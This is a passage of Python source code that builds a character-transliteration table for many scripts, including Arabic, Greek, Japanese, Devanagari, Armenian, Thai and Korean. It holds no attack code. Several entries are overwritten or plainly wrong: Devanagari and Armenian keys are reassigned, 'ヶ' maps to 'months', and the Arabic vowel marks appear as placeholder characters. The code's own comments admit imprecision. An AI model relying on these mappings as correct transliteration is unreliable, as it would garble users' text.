u\"o\",\n u\"ѻ\": u\"o\", u\"Ѿ\": u\"Ot\", u\"ѿ\": u\"ot\", u\"Ѣ\": u\"E\", u\"ѣ\": u\"e\",\n u\"Ѥ\": u\"Ei\", u\"Ѧ\": u\"Ei\", u\"ѥ\": u\"ei\", u\"ѧ\": u\"ei\", u\"Ѫ\": u\"Ai\",\n u\"ѫ\": u\"ai\", u\"Ѯ\": u\"X\", u\"ѯ\": u\"x\", u\"Ѱ\": u\"Ps\", u\"ѱ\": u\"ps\",\n u\"Ѳ\": u\"Th\", u\"ѳ\": u\"th\", u\"Ѵ\": u\"Ü\", u\"Ѷ\": u\"Ü\", u\"ѵ\": u\"ü\"})\n\n # Hebrew alphabet\n for char in u\"אע\":\n self.trans[char] = u\"'\"\n self.trans[u\"ב\"] = u\"b\"\n self.trans[u\"ג\"] = u\"g\"\n self.trans[u\"ד\"] = u\"d\"\n self.trans[u\"ה\"] = u\"h\"\n self.trans[u\"ו\"] = u\"v\"\n self.trans[u\"ז\"] = u\"z\"\n self.trans[u\"ח\"] = u\"kh\"\n self.trans[u\"ט\"] = u\"t\"\n self.trans[u\"י\"] = u\"y\"\n for char in u\"ךכ\":\n self.trans[char] = u\"k\"\n self.trans[u\"ל\"] = u\"l\"\n for char in u\"םמ\":\n self.trans[char] = u\"m\"\n for char in u\"ןנ\":\n self.trans[char] = u\"n\"\n self.trans[u\"ס\"] = u\"s\"\n for char in u\"ףפ\":\n self.trans[char] = u\"ph\"\n for char in u\"ץצ\":\n self.trans[char] = u\"ts\"\n self.trans[u\"ק\"] = u\"q\"\n self.trans[u\"ר\"] = u\"r\"\n self.trans[u\"ש\"] = u\"sh\"\n self.trans[u\"ת\"] = u\"th\"\n\n # Arab alphabet\n for char in u\"اﺍﺎ\":\n self.trans[char] = u\"a\"\n for char in u\"بﺏﺐﺒﺑ\":\n self.trans[char] = u\"b\"\n for char in u\"تﺕﺖﺘﺗ\":\n self.trans[char] = u\"t\"\n for char in u\"ثﺙﺚﺜﺛ\":\n self.trans[char] = u\"th\"\n for char in u\"جﺝﺞﺠﺟ\":\n self.trans[char] = u\"g\"\n for char in u\"حﺡﺢﺤﺣ\":\n self.trans[char] = u\"h\"\n for char in u\"خﺥﺦﺨﺧ\":\n self.trans[char] = u\"kh\"\n for char in u\"دﺩﺪ\":\n self.trans[char] = u\"d\"\n for char in u\"ذﺫﺬ\":\n self.trans[char] = u\"dh\"\n for char in u\"رﺭﺮ\":\n self.trans[char] = u\"r\"\n for char in u\"زﺯﺰ\":\n self.trans[char] = u\"z\"\n for char in u\"سﺱﺲﺴﺳ\":\n self.trans[char] = u\"s\"\n for char in u\"شﺵﺶﺸﺷ\":\n self.trans[char] = u\"sh\"\n for char in u\"صﺹﺺﺼﺻ\":\n self.trans[char] = u\"s\"\n for char in u\"ضﺽﺾﻀﺿ\":\n self.trans[char] = u\"d\"\n for char in u\"طﻁﻂﻄﻃ\":\n self.trans[char] = u\"t\"\n for char in u\"ظﻅﻆﻈﻇ\":\n self.trans[char] = u\"z\"\n for char in u\"عﻉﻊﻌﻋ\":\n 
self.trans[char] = u\"'\"\n for char in u\"غﻍﻎﻐﻏ\":\n self.trans[char] = u\"gh\"\n for char in u\"فﻑﻒﻔﻓ\":\n self.trans[char] = u\"f\"\n for char in u\"قﻕﻖﻘﻗ\":\n self.trans[char] = u\"q\"\n for char in u\"كﻙﻚﻜﻛک\":\n self.trans[char] = u\"k\"\n for char in u\"لﻝﻞﻠﻟ\":\n self.trans[char] = u\"l\"\n for char in u\"مﻡﻢﻤﻣ\":\n self.trans[char] = u\"m\"\n for char in u\"نﻥﻦﻨﻧ\":\n self.trans[char] = u\"n\"\n for char in u\"هﻩﻪﻬﻫ\":\n self.trans[char] = u\"h\"\n for char in u\"وﻭﻮ\":\n self.trans[char] = u\"w\"\n for char in u\"یيﻱﻲﻴﻳ\":\n self.trans[char] = u\"y\"\n # Arabic - additional letters, modified letters and ligatures\n self.trans[u\"ﺀ\"] = u\"'\"\n for char in u\"آﺁﺂ\":\n self.trans[char] = u\"'a\"\n for char in u\"ةﺓﺔ\":\n self.trans[char] = u\"th\"\n for char in u\"ىﻯﻰ\":\n self.trans[char] = u\"á\"\n for char in u\"یﯼﯽﯿﯾ\":\n self.trans[char] = u\"y\"\n self.trans[u\"؟\"] = u\"?\"\n # Arabic - ligatures\n for char in u\"ﻻﻼ\":\n self.trans[char] = u\"la\"\n self.trans[u\"ﷲ\"] = u\"llah\"\n for char in u\"إأ\":\n self.trans[char] = u\"a'\"\n self.trans[u\"ؤ\"] = u\"w'\"\n self.trans[u\"ئ\"] = u\"y'\"\n for char in u\"◌◌\":\n self.trans[char] = u\"\" # indicates absence of vowels\n # Arabic vowels\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"i\"\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"iy\"\n # Arab numerals\n for char in u\"٠۰\":\n self.trans[char] = u\"0\"\n for char in u\"١۱\":\n self.trans[char] = u\"1\"\n for char in u\"٢۲\":\n self.trans[char] = u\"2\"\n for char in u\"٣۳\":\n self.trans[char] = u\"3\"\n for char in u\"٤۴\":\n self.trans[char] = u\"4\"\n for char in u\"٥۵\":\n self.trans[char] = u\"5\"\n for char in u\"٦۶\":\n self.trans[char] = u\"6\"\n for char in u\"٧۷\":\n self.trans[char] = u\"7\"\n for char in u\"٨۸\":\n self.trans[char] = u\"8\"\n for char in u\"٩۹\":\n self.trans[char] = u\"9\"\n # Perso-Arabic\n for char in u\"پﭙﭙپ\":\n self.trans[char] = u\"p\"\n for char in u\"چچچچ\":\n self.trans[char] = u\"ch\"\n for char in u\"ژژ\":\n self.trans[char] = u\"zh\"\n for char in u\"گﮔﮕﮓ\":\n self.trans[char] = u\"g\"\n\n # Greek\n self.trans.update({u\"Α\": u\"A\", u\"α\": u\"a\", u\"Β\": u\"B\", u\"β\": u\"b\", u\"Γ\": u\"G\",\n u\"γ\": u\"g\", u\"Δ\": u\"D\", u\"δ\": u\"d\", u\"Ε\": u\"E\", u\"ε\": u\"e\",\n u\"Ζ\": u\"Z\", u\"ζ\": u\"z\", u\"Η\": u\"I\", u\"η\": u\"i\", u\"θ\": u\"th\",\n u\"Θ\": u\"Th\", u\"Ι\": u\"I\", u\"ι\": u\"i\", u\"Κ\": u\"K\", u\"κ\": u\"k\",\n u\"Λ\": u\"L\", u\"λ\": u\"l\", u\"Μ\": u\"M\", u\"μ\": u\"m\", u\"Ν\": u\"N\",\n u\"ν\": u\"n\", u\"Ξ\": u\"X\", u\"ξ\": u\"x\", u\"Ο\": u\"O\", u\"ο\": u\"o\",\n u\"Π\": u\"P\", u\"π\": u\"p\", u\"Ρ\": u\"R\", u\"ρ\": u\"r\", u\"Σ\": u\"S\",\n u\"σ\": u\"s\", u\"ς\": u\"s\", u\"Τ\": u\"T\", u\"τ\": u\"t\", u\"Υ\": u\"Y\",\n u\"υ\": u\"y\", u\"Φ\": u\"F\", u\"φ\": u\"f\", u\"Ψ\": u\"Ps\", u\"ψ\": u\"ps\",\n u\"Ω\": u\"O\", u\"ω\": u\"o\", u\"ϗ\": u\"&\", u\"Ϛ\": u\"St\", u\"ϛ\": u\"st\",\n u\"Ϙ\": u\"Q\", u\"Ϟ\": u\"Q\", u\"ϙ\": u\"q\", u\"ϟ\": u\"q\", u\"Ϻ\": u\"S\",\n u\"ϻ\": u\"s\", u\"Ϡ\": u\"Ss\", u\"ϡ\": u\"ss\", u\"Ϸ\": u\"Sh\", u\"ϸ\": u\"sh\",\n u\"·\": u\":\", u\"Ά\": u\"Á\", u\"ά\": u\"á\", u\"Έ\": u\"É\", u\"Ή\": u\"É\",\n u\"έ\": u\"é\", u\"ή\": u\"é\", u\"Ί\": u\"Í\", u\"ί\": u\"í\", u\"Ϊ\": u\"Ï\",\n u\"ϊ\": u\"ï\", u\"ΐ\": u\"ï\", u\"Ό\": u\"Ó\", u\"ό\": u\"ó\", u\"Ύ\": u\"Ý\",\n u\"ύ\": u\"ý\", u\"Ϋ\": u\"Y\", u\"ϋ\": u\"ÿ\", u\"ΰ\": 
u\"ÿ\", u\"Ώ\": u\"Ó\",\n u\"ώ\": u\"ó\"})\n\n # Japanese (katakana and hiragana)\n for char in u\"アァあ\":\n self.trans[char] = u\"a\"\n for char in u\"イィい\":\n self.trans[char] = u\"i\"\n for char in u\"ウう\":\n self.trans[char] = u\"u\"\n for char in u\"エェえ\":\n self.trans[char] = u\"e\"\n for char in u\"オォお\":\n self.trans[char] = u\"o\"\n for char in u\"ャや\":\n self.trans[char] = u\"ya\"\n for char in u\"ュゆ\":\n self.trans[char] = u\"yu\"\n for char in u\"ョよ\":\n self.trans[char] = u\"yo\"\n for char in u\"カか\":\n self.trans[char] = u\"ka\"\n for char in u\"キき\":\n self.trans[char] = u\"ki\"\n for char in u\"クく\":\n self.trans[char] = u\"ku\"\n for char in u\"ケけ\":\n self.trans[char] = u\"ke\"\n for char in u\"コこ\":\n self.trans[char] = u\"ko\"\n for char in u\"サさ\":\n self.trans[char] = u\"sa\"\n for char in u\"シし\":\n self.trans[char] = u\"shi\"\n for char in u\"スす\":\n self.trans[char] = u\"su\"\n for char in u\"セせ\":\n self.trans[char] = u\"se\"\n for char in u\"ソそ\":\n self.trans[char] = u\"so\"\n for char in u\"タた\":\n self.trans[char] = u\"ta\"\n for char in u\"チち\":\n self.trans[char] = u\"chi\"\n for char in u\"ツつ\":\n self.trans[char] = u\"tsu\"\n for char in u\"テて\":\n self.trans[char] = u\"te\"\n for char in u\"トと\":\n self.trans[char] = u\"to\"\n for char in u\"ナな\":\n self.trans[char] = u\"na\"\n for char in u\"ニに\":\n self.trans[char] = u\"ni\"\n for char in u\"ヌぬ\":\n self.trans[char] = u\"nu\"\n for char in u\"ネね\":\n self.trans[char] = u\"ne\"\n for char in u\"ノの\":\n self.trans[char] = u\"no\"\n for char in u\"ハは\":\n self.trans[char] = u\"ha\"\n for char in u\"ヒひ\":\n self.trans[char] = u\"hi\"\n for char in u\"フふ\":\n self.trans[char] = u\"fu\"\n for char in u\"ヘへ\":\n self.trans[char] = u\"he\"\n for char in u\"ホほ\":\n self.trans[char] = u\"ho\"\n for char in u\"マま\":\n self.trans[char] = u\"ma\"\n for char in u\"ミみ\":\n self.trans[char] = u\"mi\"\n for char in u\"ムむ\":\n self.trans[char] = u\"mu\"\n for char in u\"メめ\":\n self.trans[char] = u\"me\"\n for char in u\"モも\":\n self.trans[char] = u\"mo\"\n for char in u\"ラら\":\n self.trans[char] = u\"ra\"\n for char in u\"リり\":\n self.trans[char] = u\"ri\"\n for char in u\"ルる\":\n self.trans[char] = u\"ru\"\n for char in u\"レれ\":\n self.trans[char] = u\"re\"\n for char in u\"ロろ\":\n self.trans[char] = u\"ro\"\n for char in u\"ワわ\":\n self.trans[char] = u\"wa\"\n for char in u\"ヰゐ\":\n self.trans[char] = u\"wi\"\n for char in u\"ヱゑ\":\n self.trans[char] = u\"we\"\n for char in u\"ヲを\":\n self.trans[char] = u\"wo\"\n for char in u\"ンん\":\n self.trans[char] = u\"n\"\n for char in u\"ガが\":\n self.trans[char] = u\"ga\"\n for char in u\"ギぎ\":\n self.trans[char] = u\"gi\"\n for char in u\"グぐ\":\n self.trans[char] = u\"gu\"\n for char in u\"ゲげ\":\n self.trans[char] = u\"ge\"\n for char in u\"ゴご\":\n self.trans[char] = u\"go\"\n for char in u\"ザざ\":\n self.trans[char] = u\"za\"\n for char in u\"ジじ\":\n self.trans[char] = u\"ji\"\n for char in u\"ズず\":\n self.trans[char] = u\"zu\"\n for char in u\"ゼぜ\":\n self.trans[char] = u\"ze\"\n for char in u\"ゾぞ\":\n self.trans[char] = u\"zo\"\n for char in u\"ダだ\":\n self.trans[char] = u\"da\"\n for char in u\"ヂぢ\":\n self.trans[char] = u\"dji\"\n for char in u\"ヅづ\":\n self.trans[char] = u\"dzu\"\n for char in u\"デで\":\n self.trans[char] = u\"de\"\n for char in u\"ドど\":\n self.trans[char] = u\"do\"\n for char in u\"バば\":\n self.trans[char] = u\"ba\"\n for char in u\"ビび\":\n self.trans[char] = u\"bi\"\n for char in u\"ブぶ\":\n self.trans[char] = u\"bu\"\n for char in u\"ベべ\":\n 
self.trans[char] = u\"be\"\n for char in u\"ボぼ\":\n self.trans[char] = u\"bo\"\n for char in u\"パぱ\":\n self.trans[char] = u\"pa\"\n for char in u\"ピぴ\":\n self.trans[char] = u\"pi\"\n for char in u\"プぷ\":\n self.trans[char] = u\"pu\"\n for char in u\"ペぺ\":\n self.trans[char] = u\"pe\"\n for char in u\"ポぽ\":\n self.trans[char] = u\"po\"\n for char in u\"ヴゔ\":\n self.trans[char] = u\"vu\"\n self.trans[u\"ヷ\"] = u\"va\"\n self.trans[u\"ヸ\"] = u\"vi\"\n self.trans[u\"ヹ\"] = u\"ve\"\n self.trans[u\"ヺ\"] = u\"vo\"\n\n # Japanese and Chinese punctuation and typography\n for char in u\"・·\":\n self.trans[char] = u\" \"\n for char in u\"〃『』《》\":\n self.trans[char] = u'\"'\n for char in u\"「」〈〉〘〙〚〛\":\n self.trans[char] = u\"'\"\n for char in u\"(〔\":\n self.trans[char] = u\"(\"\n for char in u\")〕\":\n self.trans[char] = u\")\"\n for char in u\"[【〖\":\n self.trans[char] = u\"[\"\n for char in u\"]】〗\":\n self.trans[char] = u\"]\"\n self.trans['{'] = '{'\n self.trans['}'] = '}'\n self.trans['っ'] = ':'\n self.trans['ー'] = 'h'\n self.trans['゛'] = \"'\"\n self.trans['゜'] = 'p'\n self.trans['。'] = '. '\n self.trans['、'] = ', '\n self.trans['・'] = ' '\n self.trans['〆'] = 'shime'\n self.trans['〜'] = '-'\n self.trans['…'] = '...'\n self.trans['‥'] = '..'\n self.trans['ヶ'] = 'months'\n for char in u\"•◦\":\n self.trans[char] = u\"_\"\n for char in u\"※*\":\n self.trans[char] = u\"*\"\n self.trans['Ⓧ'] = '(X)'\n self.trans['Ⓨ'] = '(Y)'\n self.trans['!'] = '!'\n self.trans['?'] = '?'\n self.trans[';'] = ';'\n self.trans[':'] = ':'\n self.trans['。'] = '.'\n for char in u\",、\":\n self.trans[char] = u\",\"\n\n # Georgian\n self.trans['ა'] = 'a'\n self.trans['ბ'] = 'b'\n self.trans['გ'] = 'g'\n self.trans['დ'] = 'd'\n for char in u\"ეჱ\":\n self.trans[char] = u\"e\"\n self.trans['ვ'] = 'v'\n self.trans['ზ'] = 'z'\n self.trans['თ'] = 'th'\n self.trans['ი'] = 'i'\n self.trans['კ'] = 'k'\n self.trans['ლ'] = 'l'\n self.trans['მ'] = 'm'\n self.trans['ნ'] = 'n'\n self.trans['ო'] = 'o'\n self.trans['პ'] = 'p'\n self.trans['ჟ'] = 'zh'\n self.trans['რ'] = 'r'\n self.trans['ს'] = 's'\n self.trans['ტ'] = 't'\n self.trans['უ'] = 'u'\n self.trans['ფ'] = 'ph'\n self.trans['ქ'] = 'q'\n self.trans['ღ'] = 'gh'\n for char in u\"ყ\":\n self.trans[char] = u\"q'\"\n self.trans['შ'] = 'sh'\n self.trans['ჩ'] = 'ch'\n self.trans['ც'] = 'ts'\n self.trans['ძ'] = 'dz'\n for char in u\"წ\":\n self.trans[char] = u\"ts'\"\n for char in u\"ჭ\":\n self.trans[char] = u\"ch'\"\n self.trans['ხ'] = 'kh'\n self.trans['ჯ'] = 'j'\n self.trans['ჰ'] = 'h'\n self.trans['ჳ'] = 'w'\n self.trans['ჵ'] = 'o'\n self.trans['ჶ'] = 'f'\n\n # Devanagari\n for char in u\"पप\":\n self.trans[char] = u\"p\"\n self.trans['अ'] = 'a'\n for char in u\"आा\":\n self.trans[char] = u\"aa\"\n self.trans['प'] = 'pa'\n for char in u\"इि\":\n self.trans[char] = u\"i\"\n for char in u\"ईी\":\n self.trans[char] = u\"ii\"\n for char in u\"उु\":\n self.trans[char] = u\"u\"\n for char in u\"ऊू\":\n self.trans[char] = u\"uu\"\n for char in u\"एे\":\n self.trans[char] = u\"e\"\n for char in u\"ऐै\":\n self.trans[char] = u\"ai\"\n for char in u\"ओो\":\n self.trans[char] = u\"o\"\n for char in u\"औौ\":\n self.trans[char] = u\"au\"\n for char in u\"ऋृर\":\n self.trans[char] = u\"r\"\n for char in u\"ॠॄ\":\n self.trans[char] = u\"rr\"\n for char in u\"ऌॢल\":\n self.trans[char] = u\"l\"\n for char in u\"ॡॣ\":\n self.trans[char] = u\"ll\"\n self.trans['क'] = 'k'\n self.trans['ख'] = 'kh'\n self.trans['ग'] = 'g'\n self.trans['घ'] = 'gh'\n self.trans['ङ'] = 'ng'\n self.trans['च'] = 'c'\n 
self.trans['छ'] = 'ch'\n self.trans['ज'] = 'j'\n self.trans['झ'] = 'jh'\n self.trans['ञ'] = 'ñ'\n for char in u\"टत\":\n self.trans[char] = u\"t\"\n for char in u\"ठथ\":\n self.trans[char] = u\"th\"\n for char in u\"डद\":\n self.trans[char] = u\"d\"\n for char in u\"ढध\":\n self.trans[char] = u\"dh\"\n for char in u\"णन\":\n self.trans[char] = u\"n\"\n self.trans['फ'] = 'ph'\n self.trans['ब'] = 'b'\n self.trans['भ'] = 'bh'\n self.trans['म'] = 'm'\n self.trans['य'] = 'y'\n self.trans['व'] = 'v'\n self.trans['श'] = 'sh'\n for char in u\"षस\":\n self.trans[char] = u\"s\"\n self.trans['ह'] = 'h'\n self.trans['क'] = 'x'\n self.trans['त'] = 'tr'\n self.trans['ज'] = 'gj'\n for char in u\"क़\":\n self.trans[char] = u\"q\"\n self.trans['फ'] = 'f'\n self.trans['ख'] = 'hh'\n self.trans['H'] = 'gh'\n self.trans['ज'] = 'z'\n for char in u\"डढ\":\n self.trans[char] = u\"r\"\n # Devanagari ligatures (possibly incomplete and/or incorrect)\n for char in u\"ख्\":\n self.trans[char] = u\"khn\"\n self.trans['त'] = 'tn'\n for char in u\"द्\":\n self.trans[char] = u\"dn\"\n self.trans['श'] = 'cn'\n for char in u\"ह्\":\n self.trans[char] = u\"fn\"\n for char in u\"अँ\":\n self.trans[char] = u\"m\"\n for char in u\"॒॑\":\n self.trans[char] = u\"\"\n self.trans['०'] = '0'\n self.trans['१'] = '1'\n self.trans['२'] = '2'\n self.trans['३'] = '3'\n self.trans['४'] = '4'\n self.trans['५'] = '5'\n self.trans['६'] = '6'\n self.trans['७'] = '7'\n self.trans['८'] = '8'\n self.trans['९'] = '9'\n\n # Armenian\n self.trans['Ա'] = 'A'\n self.trans['ա'] = 'a'\n self.trans['Բ'] = 'B'\n self.trans['բ'] = 'b'\n self.trans['Գ'] = 'G'\n self.trans['գ'] = 'g'\n self.trans['Դ'] = 'D'\n self.trans['դ'] = 'd'\n self.trans['Ե'] = 'Je'\n self.trans['ե'] = 'e'\n self.trans['Զ'] = 'Z'\n self.trans['զ'] = 'z'\n self.trans['Է'] = 'É'\n self.trans['է'] = 'é'\n self.trans['Ը'] = 'Ë'\n self.trans['ը'] = 'ë'\n self.trans['Թ'] = 'Th'\n self.trans['թ'] = 'th'\n self.trans['Ժ'] = 'Zh'\n self.trans['ժ'] = 'zh'\n self.trans['Ի'] = 'I'\n self.trans['ի'] = 'i'\n self.trans['Լ'] = 'L'\n self.trans['լ'] = 'l'\n self.trans['Խ'] = 'Ch'\n self.trans['խ'] = 'ch'\n self.trans['Ծ'] = 'Ts'\n self.trans['ծ'] = 'ts'\n self.trans['Կ'] = 'K'\n self.trans['կ'] = 'k'\n self.trans['Հ'] = 'H'\n self.trans['հ'] = 'h'\n self.trans['Ձ'] = 'Dz'\n self.trans['ձ'] = 'dz'\n self.trans['Ղ'] = 'R'\n self.trans['ղ'] = 'r'\n self.trans['Ճ'] = 'Cz'\n self.trans['ճ'] = 'cz'\n self.trans['Մ'] = 'M'\n self.trans['մ'] = 'm'\n self.trans['Յ'] = 'J'\n self.trans['յ'] = 'j'\n self.trans['Ն'] = 'N'\n self.trans['ն'] = 'n'\n self.trans['Շ'] = 'S'\n self.trans['շ'] = 's'\n self.trans['Շ'] = 'Vo'\n self.trans['շ'] = 'o'\n self.trans['Չ'] = 'Tsh'\n self.trans['չ'] = 'tsh'\n self.trans['Պ'] = 'P'\n self.trans['պ'] = 'p'\n self.trans['Ջ'] = 'Dz'\n self.trans['ջ'] = 'dz'\n self.trans['Ռ'] = 'R'\n self.trans['ռ'] = 'r'\n self.trans['Ս'] = 'S'\n self.trans['ս'] = 's'\n self.trans['Վ'] = 'V'\n self.trans['վ'] = 'v'\n for char in u\"Տ\":\n self.trans[char] = u\"T'\"\n for char in u\"տ\":\n self.trans[char] = u\"t'\"\n self.trans['Ր'] = 'R'\n self.trans['ր'] = 'r'\n self.trans['Ց'] = 'Tsh'\n self.trans['ց'] = 'tsh'\n self.trans['Ւ'] = 'V'\n self.trans['ւ'] = 'v'\n self.trans['Փ'] = 'Ph'\n self.trans['փ'] = 'ph'\n self.trans['Ք'] = 'Kh'\n self.trans['ք'] = 'kh'\n self.trans['Օ'] = 'O'\n self.trans['օ'] = 'o'\n self.trans['Ֆ'] = 'F'\n self.trans['ֆ'] = 'f'\n self.trans['և'] = '&'\n self.trans['՟'] = '.'\n self.trans['՞'] = '?'\n self.trans['՝'] = ';'\n self.trans['՛'] = ''\n\n # Tamil\n for char in 
u\"க்\":\n self.trans[char] = u\"k\"\n for char in u\"ஙண்ந்ன்\":\n self.trans[char] = u\"n\"\n self.trans['ச'] = 'c'\n for char in u\"ஞ்\":\n self.trans[char] = u\"ñ\"\n for char in u\"ட்\":\n self.trans[char] = u\"th\"\n self.trans['த'] = 't'\n self.trans['ப'] = 'p'\n for char in u\"ம்\":\n self.trans[char] = u\"m\"\n for char in u\"ய்\":\n self.trans[char] = u\"y\"\n for char in u\"ர்ழ்ற\":\n self.trans[char] = u\"r\"\n for char in u\"ல்ள\":\n self.trans[char] = u\"l\"\n for char in u\"வ்\":\n self.trans[char] = u\"v\"\n self.trans['ஜ'] = 'j'\n self.trans['ஷ'] = 'sh'\n self.trans['ஸ'] = 's'\n self.trans['ஹ'] = 'h'\n for char in u\"க்ஷ\":\n self.trans[char] = u\"x\"\n self.trans['அ'] = 'a'\n self.trans['ஆ'] = 'aa'\n self.trans['இ'] = 'i'\n self.trans['ஈ'] = 'ii'\n self.trans['உ'] = 'u'\n self.trans['ஊ'] = 'uu'\n self.trans['எ'] = 'e'\n self.trans['ஏ'] = 'ee'\n self.trans['ஐ'] = 'ai'\n self.trans['ஒ'] = 'o'\n self.trans['ஓ'] = 'oo'\n self.trans['ஔ'] = 'au'\n self.trans['ஃ'] = ''\n\n # Bengali\n self.trans['অ'] = 'ô'\n for char in u\"আা\":\n self.trans[char] = u\"a\"\n for char in u\"ইিঈী\":\n self.trans[char] = u\"i\"\n for char in u\"উুঊূ\":\n self.trans[char] = u\"u\"\n for char in u\"ঋৃ\":\n self.trans[char] = u\"ri\"\n for char in u\"এেয়\":\n self.trans[char] = u\"e\"\n for char in u\"ঐৈ\":\n self.trans[char] = u\"oi\"\n for char in u\"ওো\":\n self.trans[char] = u\"o\"\n for char in u\"ঔৌ\":\n self.trans[char] = \"ou\"\n self.trans['্'] = ''\n self.trans['ৎ'] = 't'\n self.trans['ং'] = 'n'\n self.trans['ঃ'] = 'h'\n self.trans['ঁ'] = 'ñ'\n self.trans['ক'] = 'k'\n self.trans['খ'] = 'kh'\n self.trans['গ'] = 'g'\n self.trans['ঘ'] = 'gh'\n self.trans['ঙ'] = 'ng'\n self.trans['চ'] = 'ch'\n self.trans['ছ'] = 'chh'\n self.trans['জ'] = 'j'\n self.trans['ঝ'] = 'jh'\n self.trans['ঞ'] = 'n'\n for char in u\"টত\":\n self.trans[char] = u\"t\"\n for char in u\"ঠথ\":\n self.trans[char] = u\"th\"\n for char in u\"ডদ\":\n self.trans[char] = u\"d\"\n for char in u\"ঢধ\":\n self.trans[char] = u\"dh\"\n for char in u\"ণন\":\n self.trans[char] = u\"n\"\n self.trans['প'] = 'p'\n self.trans['ফ'] = 'ph'\n self.trans['ব'] = 'b'\n self.trans['ভ'] = 'bh'\n self.trans['ম'] = 'm'\n self.trans['য'] = 'dzh'\n self.trans['র'] = 'r'\n self.trans['ল'] = 'l'\n self.trans['শ'] = 's'\n self.trans['হ'] = 'h'\n for char in u\"য়\":\n self.trans[char] = u\"-\"\n for char in u\"ড়\":\n self.trans[char] = u\"r\"\n self.trans['ঢ'] = 'rh'\n self.trans['০'] = '0'\n self.trans['১'] = '1'\n self.trans['২'] = '2'\n self.trans['৩'] = '3'\n self.trans['৪'] = '4'\n self.trans['৫'] = '5'\n self.trans['৬'] = '6'\n self.trans['৭'] = '7'\n self.trans['৮'] = '8'\n self.trans['৯'] = '9'\n\n # Thai (because of complications of the alphabet, self.transliterations\n # are very imprecise here)\n self.trans['ก'] = 'k'\n for char in u\"ขฃคฅฆ\":\n self.trans[char] = u\"kh\"\n self.trans['ง'] = 'ng'\n for char in u\"จฉชฌ\":\n self.trans[char] = u\"ch\"\n for char in u\"ซศษส\":\n self.trans[char] = u\"s\"\n for char in u\"ญย\":\n self.trans[char] = u\"y\"\n for char in u\"ฎด\":\n self.trans[char] = u\"d\"\n for char in u\"ฏต\":\n self.trans[char] = u\"t\"\n for char in u\"ฐฑฒถทธ\":\n self.trans[char] = u\"th\"\n for char in u\"ณน\":\n self.trans[char] = u\"n\"\n self.trans['บ'] = 'b'\n self.trans['ป'] = 'p'\n for char in u\"ผพภ\":\n self.trans[char] = u\"ph\"\n for char in u\"ฝฟ\":\n self.trans[char] = u\"f\"\n self.trans['ม'] = 'm'\n self.trans['ร'] = 'r'\n self.trans['ฤ'] = 'rue'\n self.trans['ๅ'] = ':'\n for char in u\"ลฬ\":\n self.trans[char] = 
u\"l\"\n self.trans['ฦ'] = 'lue'\n self.trans['ว'] = 'w'\n for char in u\"หฮ\":\n self.trans[char] = u\"h\"\n self.trans['อ'] = ''\n self.trans['ร'] = 'ü'\n self.trans['ว'] = 'ua'\n for char in u\"อวโิ\":\n self.trans[char] = u\"o\"\n for char in u\"ะัา\":\n self.trans[char] = u\"a\"\n self.trans['ว'] = 'u'\n self.trans['ำ'] = 'am'\n self.trans['ิ'] = 'i'\n self.trans['ี'] = 'i:'\n self.trans['ึ'] = 'ue'\n self.trans['ื'] = 'ue:'\n self.trans['ุ'] = 'u'\n self.trans['ู'] = 'u:'\n for char in u\"เ็\":\n self.trans[char] = u\"e\"\n self.trans['แ'] = 'ae'\n for char in u\"ใไ\":\n self.trans[char] = u\"ai\"\n for char in u\"่้๊๋็์\":\n self.trans[char] = u\"\"\n self.trans['ฯ'] = '.'\n self.trans['ๆ'] = '(2)'\n\n # Korean (Revised Romanization system within possible, incomplete)\n self.trans['국'] = 'guk'\n self.trans['명'] = 'myeong'\n self.trans['검'] = 'geom'\n self.trans['타'] = 'ta'\n self.trans['분'] = 'bun'\n self.trans['사'] = 'sa'\n self.trans['류'] = 'ryu'\n self.trans['포'] = 'po'\n self.trans['르'] = 'reu'\n self.trans['투'] = 'tu'\n self.trans['갈'] = 'gal'\n self.trans['어'] = 'eo'\n self.trans['노'] = 'no'\n self.trans['웨'] = 'we'\n self.trans['이'] = 'i'\n self.trans['라'] = 'ra'\n self.trans['틴'] = 'tin'\n self.trans['루'] = 'ru'\n self.trans['마'] = 'ma'\n self.trans['니'] = 'ni'\n self.trans['아'] = 'a'\n self.trans['독'] = 'dok'\n self.trans['일'] = 'il'\n self.trans['모'] = 'mo'\n self.trans['크'] = 'keu'\n self.trans['샤'] = 'sya'\n self.trans['영'] = 'yeong'\n self.trans['불'] = 'bul'\n self.trans['가'] = 'ga'\n self.trans['리'] = 'ri'\n self.trans['그'] = 'geu'\n self.trans['지'] = 'ji'\n self.trans['야'] = 'ya'\n self.trans['바'] = 'ba'\n self.trans['슈'] = 'syu'\n self.trans['키'] = 'ki'\n self.trans['프'] = 'peu'\n self.trans['랑'] = 'rang'\n self.trans['스'] = 'seu'\n self.trans['로'] = 'ro'\n self.trans['메'] = 'me'\n self.trans['역'] = 'yeok'\n self.trans['도'] = 'do'\n\n # Kannada\n self.trans[u\"ಅ\"] = u\"a\"\n for char in u\"ಆಾ\":\n self.trans[char] = u\"aa\"\n for char in u\"ಇಿ\":\n self.trans[char] = u\"i\"\n for char in u\"ಈೀ\":\n self.trans[char] = u\"ii\"\n for char in u\"ಉು\":\n self.trans[char] = u\"u\"\n for char in u\"ಊೂ\":\n self.trans[char] = u\"uu\"\n for char in u\"ಋೂ\":\n self.trans[char] = u\"r'\"\n for char in u\"ಎೆ\":\n self.trans[char] = u\"e\"\n for char in u\"ಏೇ\":\n self.trans[char] = u\"ee\"\n for char in u\"ಐೈ\":\n self.trans[char] = u\"ai\"\n for char in u\"ಒೊ\":\n self.trans[char] = u\"o\"\n for char in u\"ಓೋ\":\n self.trans[char] = u\"oo\"\n for char in u\"ಔೌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ಂ\"] = u\"m'\"\n self.trans[u\"ಃ\"] = u\"h'\"\n self.trans[u\"ಕ\"] = u\"k\"\n self.trans[u\"ಖ\"] = u\"kh\"\n self.trans[u\"ಗ\"] = u\"g\"\n self.trans[u\"ಘ\"] = u\"gh\"\n self.trans[u\"ಙ\"] = u\"ng\"\n self.trans[u\"ಚ\"] = u\"c\"\n self.trans[u\"ಛ\"] = u\"ch\"\n self.trans[u\"ಜ\"] = u\"j\"\n self.trans[u\"ಝ\"] = u\"ny\"\n self.trans[u\"ಟ\"] = u\"tt\"\n self.trans[u\"ಠ\"] = u\"tth\"\n self.trans[u\"ಡ\"] = 